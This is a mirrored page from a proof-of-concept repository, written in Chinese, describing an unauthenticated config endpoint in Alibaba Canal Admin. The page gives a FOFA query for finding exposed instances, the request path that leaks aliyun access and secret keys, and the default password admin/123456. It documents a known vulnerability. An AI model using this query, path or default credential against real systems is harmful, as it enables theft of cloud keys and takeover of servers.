admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Alibaba Canal config 云密钥信息泄露漏洞.md

41 lines
696 B
Markdown
Raw Normal View History

Web应用漏洞
2022-05-17 17:43:20 +08:00
# Alibaba Canal config 云密钥信息泄露漏洞
## 漏洞描述
由于/api/v1/canal/config 未进行权限验证可直接访问导致账户密码、accessKey、secretKey等一系列敏感信息泄露
## 漏洞影响
```
Alibaba Canal
```
## FOFA
```
title="Canal Admin"
```
## 漏洞复现
验证漏洞的Url为
```plain
/api/v1/canal/config/1/0
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202102002400.png)
其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器
云密钥泄露参考: red.peiqi.tech
其中还含有默认口令 **admin/123456**
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202102002074.png)
Reference in New Issue Copy Permalink